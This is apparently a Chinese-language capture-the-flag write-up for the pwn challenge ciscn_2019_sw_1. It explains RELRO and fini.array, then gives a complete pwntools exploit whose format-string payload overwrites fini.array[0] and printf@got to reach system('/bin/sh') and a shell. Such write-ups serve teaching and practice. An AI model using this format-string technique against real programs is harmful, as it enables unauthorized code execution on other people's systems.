Loading

ciscn_2019_sw_1

ciscn_2019_sw_1

总结

根据本题,学习与收获有:

  • RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写;为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写;为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。
  • 程序在加载的时候,会依次调用init.array数组中的每一个函数指针,在结束的时候,依次调用fini.array中的每一个函数指针
  • 当程序出现格式化字符串漏洞,但是需要写两次才能完成攻击,这个时候可以考虑改写fini.array中的函数指针为main函数地址,可以再执行一次main函数。一般来说,这个数组的长度为1,也就是说只能写一个地址。

题目分析

checksec

函数分析

main

程序比较简单,只有一个main函数,而且就是格式化字符串漏洞。同时注意到,程序中有一个sys函数,里面调用了system

sys

漏洞点

漏洞点很明显,就是main函数中的格式化字符串漏洞。可以并且格式化参数是一个栈变量而不是堆变量,相对来说利用难度要低一点。并且程序给了system函数,其实都不需要泄露地址。

利用思路

知识点

  • 程序在结束的时候会调用fini.array函数指针数组中的每一个回调函数。

利用过程

  • 利用格式化字符串漏洞,将fini.array[0]改写为main函数地址,与此同时,将printf@got改写为system@plt,获得第二次执行main函数的机会
  • 输入/bin/sh获取shell

EXP

调试过程

  1. 测出printf格式化字符串的偏移

    输入:aaaa%x,%x,%x,%x,%x,%x,%x,%x,%x,%x

    测量出偏移为4

  2. 第一次改写fini.arrayprintf@got,直接手撸:

    payload = b"%2052c%13$hn%31692c%14$hn%356c%15$hn"+ p32(0x804989c + 2) + p32(0x804989c) + p32(0x804979c)
    
    sh.recvline()
    sh.sendline(payload)
    

    改写前

    改写后

  3. 第二次输入/bin/sh获取shell

完整exp

from pwn import *

sh = process("./ciscn_2019_sw_1")
# 往fini.array[0]写main@text, printf@got写system@plt
payload = b"%2052c%13$hn%31692c%14$hn%356c%15$hn" + p32(0x804989c + 2) + p32(0x804989c) + p32(0x804979c)

sh.recvline()

sh.sendline(payload)

sleep(1)

sh.sendline("/bin/sh")
sh.interactive()

远程攻击效果

参考与引用

我的博客地址https://roderickchan.github.io/

posted @ 2021-04-14 23:42  LynneHuan  阅读(755)  评论(0编辑  收藏  举报